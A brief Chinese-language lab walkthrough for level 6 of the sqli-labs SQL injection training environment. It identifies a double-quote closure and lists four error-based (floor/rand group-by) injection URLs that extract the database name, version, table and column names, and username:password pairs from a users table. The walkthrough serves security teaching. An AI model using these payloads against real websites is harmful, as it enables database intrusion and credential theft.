Less-6

Less-6

 

(1)判断注入点的闭合方式

通过添加不同的特殊符号，发现双引号出现报错提示，因此闭合方式为双引号

 

 

（2）报错注入

 

由于页面没有回显，所以采用报错注入更加方便

尝试了上一关结束的几种报错方法，发现只有floor的报错有回显，所以使用该方式注入：

#查询数据库信息
http://192.168.88.133/mysqli-labs/Less-6/?id=1" union select count(*),0,concat(database(),0x7e,version(),floor(rand(0)*2)) x from information_schema.tables group by x --+

#查询表名

http://192.168.88.133/mysqli-labs/Less-6/?id=1" union select count(*),0,concat((select table_name from information_schema.tables where table_schema=database() limit 0,1),floor(rand(0)*2)) x from information_schema.tables group by x --

#查询列名

http://192.168.88.133/mysqli-labs/Less-6/?id=1" union select count(*),0,concat((select column_name from information_schema.columns where table_name='users' limit 0,1),floor(rand(0)*2)) x from information_schema.tables group by x --+

#查询内容

http://192.168.88.133/mysqli-labs/Less-6/?id=1" union select count(*),0,concat((select concat(username,0x3a,password ) from users limit 1,1),floor(rand(0)*2)) x from information_schema.tables group by x --+

 

 

 

 

 

 

 

 

 

 

 

 

 

 注：更多方法可以自己尝试下！，欢迎指正和交流~~